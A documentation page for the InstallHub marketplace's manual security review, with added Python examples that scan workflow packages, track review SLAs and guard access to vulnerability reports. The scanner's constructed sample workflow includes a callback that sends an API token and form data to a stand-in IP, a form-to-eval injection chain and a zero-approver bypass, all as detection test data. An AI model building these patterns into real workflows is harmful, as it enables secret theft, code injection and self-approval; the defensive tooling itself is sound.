InstallHub
# Manual Security Review
Certain packages trigger a mandatory human security review in addition to the automated scan. Manual review is also required when a package requests the Certified trust level, and it is available on request for packages with complex logic.

Phase 3 (PENDING): marketplace manual review is planned but not yet implemented. Direct-import WARN/FAIL handling was implemented in Phase 2.
## When Manual Review Is Triggered
| Trigger | Who Reviews | SLA |
|---|---|---|
| Automated scan returns WARN for marketplace submission | BizFirstGO security team | 3 business days |
| Publisher requests Certified status | BizFirstGO security team + reviewer | 5 business days |
| Publisher submits a false positive exception request | BizFirstGO security team | 2 business days |
| Publisher requests manual review (optional, not required) | BizFirstGO security team | 5 business days |
| Post-listing vulnerability report from the community | BizFirstGO security team | 24 hours (urgent) |
| Nightly re-scan produces WARN/FAIL for a previously PASS package | BizFirstGO security team | 48 hours |
## What a Manual Reviewer Examines
A human reviewer inspects the full package contents, not just the fields flagged by the automated scanner. The review focuses on:
- Understanding the business purpose of each artifact — do the logic and configuration align?
- Identifying subtle injection patterns that regex-based rules miss (e.g., obfuscated expressions, multi-step injection chains)
- Reviewing HTTP callback node configurations — what data is sent, to what destination, under what conditions
- Examining conditional logic paths that could create backdoors or privilege escalation paths in the workflow
- Validating that the package's claimed functionality matches its actual implementation
- Checking that all external service integrations are legitimate and appropriately scoped
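The three review concerns that regex rules handle worst (callback destinations and payloads, multi-step injection chains, and approval logic driven by user input) can be partly mechanised as a reviewer aid. The following is an added example, not InstallHub code: the workflow schema it reads (node types `HttpCallback`, `SetField`, `Condition` and the `{{ref}}` expression syntax) is a constructed stand-in for the real package format, and the sample workflow is constructed to exercise each check.

```python
import json
import re
from urllib.parse import urlparse

# Constructed sample workflow (not a real InstallHub package). Node types and the
# {{ref}} expression syntax are assumptions standing in for the real schema.
SAMPLE_WORKFLOW = {
    "nodes": [
        {"id": "sync", "type": "HttpCallback", "method": "POST",
         "url": "https://api.partner.example/v1/sync",
         "body": {"employee": "{{form.employeeId}}", "status": "{{form.status}}"},
         "when": "form.status == 'Approved'"},
        {"id": "beacon", "type": "HttpCallback", "method": "POST",
         "url": "https://203.0.113.7/collect",
         "body": {"token": "{{env.API_TOKEN}}", "record": "{{form}}"},
         "when": "true"},
        # Two innocuous-looking steps that only become an injection when read together.
        {"id": "copy", "type": "SetField", "field": "tmp", "value": "{{form.notes}}"},
        {"id": "run", "type": "SetField", "field": "result", "value": "eval({{tmp}})"},
        # Approval gate whose threshold is read from user-controlled form input.
        {"id": "gate", "type": "Condition",
         "expression": "form.approverCount == 0 || approvals >= form.approverCount",
         "then": "approve"},
    ]
}

REF = re.compile(r"\{\{\s*([A-Za-z_][\w.]*)\s*\}\}")   # {{form.field}} style references
SINKS = ("eval(", "exec(", "Function(")                 # expression evaluators worth tracing
THRESHOLD = re.compile(r"(form\.\w+)\s*==\s*0|>=\s*(form\.\w+)")


def callback_inventory(workflow, allowed_hosts):
    """Answer 'what is sent, to where, under what condition' for each HttpCallback node."""
    findings = []
    for node in workflow["nodes"]:
        if node["type"] != "HttpCallback":
            continue
        host = urlparse(node["url"]).hostname or ""
        refs = REF.findall(json.dumps(node.get("body", {})))
        issues = []
        if host not in allowed_hosts:
            issues.append("destination not on allowlist")
        if node.get("when", "true").strip() in ("", "true"):
            issues.append("unconditional send")
        if any(r.startswith("env.") for r in refs):
            issues.append("sends environment secret")
        if "form" in refs:
            issues.append("sends whole form")
        findings.append({"node": node["id"], "host": host, "fields": refs, "issues": issues})
    return findings


def injection_chains(workflow):
    """Follow {{ref}} edges across SetField nodes so that a sink reading an
    intermediate field is traced back to the form input that feeds it."""
    assigns = {n["field"]: n for n in workflow["nodes"] if n["type"] == "SetField"}
    chains = []
    for node in assigns.values():
        if not any(s in node["value"] for s in SINKS):
            continue
        stack = [(r, [node["id"]]) for r in REF.findall(node["value"])]
        seen = set()
        while stack:
            ref, path = stack.pop()
            if ref in seen:
                continue
            seen.add(ref)
            if ref.startswith("form."):
                chains.append({"sink": node["id"], "source": ref, "via": path})
            elif ref in assigns:
                nxt = assigns[ref]
                stack.extend((r, path + [nxt["id"]]) for r in REF.findall(nxt["value"]))
    return chains


def user_controlled_thresholds(workflow):
    """Flag Condition nodes that compare a form field to zero or use one as an approval threshold."""
    out = []
    for node in workflow["nodes"]:
        if node["type"] != "Condition":
            continue
        hits = {a or b for a, b in THRESHOLD.findall(node["expression"])}
        if hits:
            out.append({"node": node["id"], "fields": sorted(hits)})
    return out


def review_package(workflow, allowed_hosts):
    """Bundle the three checks into one report for the human reviewer."""
    return {
        "callbacks": callback_inventory(workflow, allowed_hosts),
        "chains": injection_chains(workflow),
        "thresholds": user_controlled_thresholds(workflow),
    }


if __name__ == "__main__":
    print(json.dumps(review_package(SAMPLE_WORKFLOW, {"api.partner.example"}), indent=2))
```

The point of `injection_chains` is that neither `copy` nor `run` looks dangerous on its own (one copies a form field, the other evaluates an internal field), so a per-node regex passes both; only following the reference graph ties the `eval(` sink back to `form.notes`. The callback inventory does not judge a destination by itself; it hands the reviewer the host, the fields and the condition so the "business purpose" question in the list above can actually be asked.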
## Requesting an Optional Manual Review

```http
POST /api/marketplace/submissions/{submissionId}/request-manual-review
Authorization: Bearer {publisherToken}

{
  "reason": "This package integrates with three external REST APIs and performs multi-tenant data aggregation. We would like a human review to verify the integration logic is secure before listing."
}

// Response:
{
  "reviewRequestId": "rev-req-a1b2c3",
  "status": "Queued",
  "estimatedDays": 5,
  "note": "Optional manual review requested. Package will not be listed until review is complete."
}
```
## Manual Review Outcome
| Outcome | Effect |
|---|---|
| Approved — PASS | Package listed with manual-review-cleared note in security badge. Existing WARN findings dismissed. |
| Approved — WARN Accepted | Package listed. WARN findings remain visible in badge but reviewer has assessed them as non-blocking risks. |
| Rejected | Publisher receives detailed rejection with specific findings. Package not listed. Publisher must fix and resubmit. |
| Conditional Approval | Package approved with mandatory usage restrictions (e.g., "Install permitted for Certified publishers only" or "Requires acknowledgeCommunityPackage with explicit note"). |
## Review Report

```http
GET /api/marketplace/submissions/{submissionId}/manual-review

{
  "submissionId": "sub-a1b2c3d4",
  "reviewId": "rev-a1b2c3",
  "status": "Complete",
  "outcome": "Approved",
  "scanClearance": "WarnAccepted",
  "reviewer": "BizFirstGO Security Team",
  "reviewedAt": "2026-05-28T14:00:00Z",
  "notes": "Medium CVE in form-utils@1.0.0 reviewed. The affected code path (image parsing) is not exercised by this package's form definitions. The dependency is used only for field validation utilities. Risk accepted. Publisher advised to update to 1.0.1 in next release.",
  "effect": "Package listed as Community with WARN badge. CVE finding remains visible to installers."
}
```
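A review queue has to do two things with the material on this page: track each open review against the SLA in the trigger table (which mixes business days and clock hours) and turn a finished report into the listing effect from the Outcome table. The following is an added example, not InstallHub code. The trigger keys, the queue entries, the `ConditionalApproval` outcome value and the `restrictions` field are assumptions (the page shows only `Approved` and `Rejected` as `outcome` values); the SLA figures and the sample report are taken from the tables and the report above.

```python
from datetime import datetime, timedelta

# SLA per trigger, taken from the trigger table: (amount, unit). Keys are assumed names.
SLA = {
    "scan_warn": (3, "business_days"),
    "certified_request": (5, "business_days"),
    "false_positive_exception": (2, "business_days"),
    "optional_review": (5, "business_days"),
    "community_vuln_report": (24, "hours"),
    "nightly_rescan_regression": (48, "hours"),
}


def parse_ts(text):
    """Parse the API's ISO-8601 UTC timestamps (trailing 'Z')."""
    return datetime.fromisoformat(text.replace("Z", "+00:00"))


def add_business_days(start, days):
    """Advance `days` Mon-Fri business days; a weekend start counts from Monday."""
    current = start
    while current.weekday() >= 5:        # 5 = Saturday, 6 = Sunday
        current += timedelta(days=1)
    remaining = days
    while remaining > 0:
        current += timedelta(days=1)
        if current.weekday() < 5:
            remaining -= 1
    return current


def sla_deadline(trigger, received_at):
    """Deadline for a trigger: urgent triggers use clock hours, the rest business days."""
    amount, unit = SLA[trigger]
    if unit == "hours":
        return received_at + timedelta(hours=amount)
    return add_business_days(received_at, amount)


def overdue(queue, now):
    """Return ids of queue entries whose SLA deadline has passed."""
    return [e["id"] for e in queue if sla_deadline(e["trigger"], parse_ts(e["received_at"])) < now]


def listing_effect(report):
    """Map a manual-review report onto the Outcome table.
    The ConditionalApproval outcome value and the restrictions field are assumptions."""
    if report.get("status") != "Complete":
        return {"listed": False, "badge": None, "restrictions": [], "action": "wait for review"}
    outcome = report["outcome"]
    if outcome == "Rejected":
        return {"listed": False, "badge": None, "restrictions": [], "action": "fix and resubmit"}
    # Approved or ConditionalApproval: WARN findings are dismissed (PASS) or stay visible (WarnAccepted).
    badge = "WARN" if report.get("scanClearance") == "WarnAccepted" else "PASS"
    restrictions = report.get("restrictions", []) if outcome == "ConditionalApproval" else []
    return {"listed": True, "badge": badge, "restrictions": restrictions,
            "action": "enforce restrictions at install" if restrictions else "list"}


# Constructed queue entries (ids reuse the page's examples) and the report shown above.
SAMPLE_QUEUE = [
    {"id": "rev-req-a1b2c3", "trigger": "optional_review", "received_at": "2026-05-21T09:00:00Z"},
    {"id": "vr-a1b2c3", "trigger": "community_vuln_report", "received_at": "2026-05-28T14:00:00Z"},
]
SAMPLE_REPORT = {"submissionId": "sub-a1b2c3d4", "reviewId": "rev-a1b2c3", "status": "Complete",
                 "outcome": "Approved", "scanClearance": "WarnAccepted"}

if __name__ == "__main__":
    now = parse_ts("2026-05-29T10:00:00Z")
    print("overdue:", overdue(SAMPLE_QUEUE, now))
    print("effect:", listing_effect(SAMPLE_REPORT))
```

With the constructed queue, the optional review received on Thursday 2026-05-21 falls due on Thursday 2026-05-28 (five business days, the weekend skipped), so it is overdue at the sample `now`, while the community report received at 14:00 on 2026-05-28 is still inside its 24-hour window. The sample report maps to "listed, WARN badge visible", which is exactly the `effect` string in the report above.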
## Reporting a Security Vulnerability in a Listed Package

If you discover a security vulnerability in a listed marketplace package, use the responsible disclosure endpoint. The report is confidential — only the publisher and BizFirstGO security team can see it.

```http
POST /api/marketplace/packages/{packageId}/report-vulnerability

{
  "affectedVersion": "3.0.0",
  "description": "The ApprovalRules RuleSet in this package contains a condition that bypasses multi-approver requirements when the approver count field is set to zero. This allows a single user to approve their own requests by manipulating form input.",
  "severity": "High",
  "reporterEmail": "security@myorg.com" // Optional — for follow-up
}

// Response:
{
  "reportId": "vr-a1b2c3",
  "status": "Received",
  "message": "Thank you for your report. BizFirstGO security team will investigate within 24 hours. If the vulnerability is confirmed, the affected version will be flagged and the publisher notified.",
  "disclosurePolicy": "https://bizfirstai.com/security/responsible-disclosure"
}
```
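The confidentiality rule stated above ("only the publisher and BizFirstGO security team can see it") is an authorization decision the server has to make on every read, and it is the kind of check that goes wrong when the publisher identity is taken from the request instead of from the package record. The following is an added example of the server-side handling, not InstallHub code: the package registry, the principal model, the severity set (the page shows only `High`) and the report-id format are constructed assumptions.

```python
import itertools

# Constructed registry and report store; the severity set is an assumption
# (the page shows only "High").
SEVERITIES = ("Low", "Medium", "High", "Critical")
PACKAGES = {
    "pkg-approvals": {"publisherId": "pub-acme", "versions": {"2.9.0", "3.0.0"}},
}
REPORTS = {}
_report_ids = itertools.count(1)


def submit_report(package_id, payload):
    """Validate a vulnerability report before storing it; reporterEmail stays optional."""
    pkg = PACKAGES.get(package_id)
    if pkg is None:
        return {"status": "Rejected", "problems": ["unknown package"]}
    problems = []
    if payload.get("affectedVersion") not in pkg["versions"]:
        problems.append("affectedVersion is not a listed version of this package")
    if not payload.get("description", "").strip():
        problems.append("description is required")
    if payload.get("severity") not in SEVERITIES:
        problems.append("severity must be one of " + ", ".join(SEVERITIES))
    if problems:
        return {"status": "Rejected", "problems": problems}
    report_id = "vr-%06d" % next(_report_ids)      # assumed id format
    REPORTS[report_id] = {
        "packageId": package_id,
        "status": "Received",
        **{k: payload[k] for k in ("affectedVersion", "description", "severity")},
        "reporterEmail": payload.get("reporterEmail"),
    }
    return {"reportId": report_id, "status": "Received"}


def view_report(report_id, principal):
    """Only the package's publisher and the security team may read a report.
    The owning publisher is looked up from the stored package record, never
    taken from the request, and an unauthorized caller receives the same
    answer as for a non-existent id so report ids cannot be enumerated."""
    report = REPORTS.get(report_id)
    if report is None:
        return None
    owner = PACKAGES[report["packageId"]]["publisherId"]
    is_security_team = principal.get("role") == "security-team"
    is_owner = principal.get("publisherId") == owner
    return report if (is_security_team or is_owner) else None


if __name__ == "__main__":
    ack = submit_report("pkg-approvals", {
        "affectedVersion": "3.0.0", "severity": "High",
        "description": "approver count of zero bypasses the multi-approver check",
    })
    print(ack)
    print(view_report(ack["reportId"], {"role": "security-team"}))
    print(view_report(ack["reportId"], {"publisherId": "pub-other"}))   # None: another publisher
```

Checking `affectedVersion` against the package's listed versions keeps the triage queue free of reports that cannot be matched to a release, and returning `None` for both "not found" and "not yours" means a publisher probing sequential report ids learns nothing about reports filed against other packages.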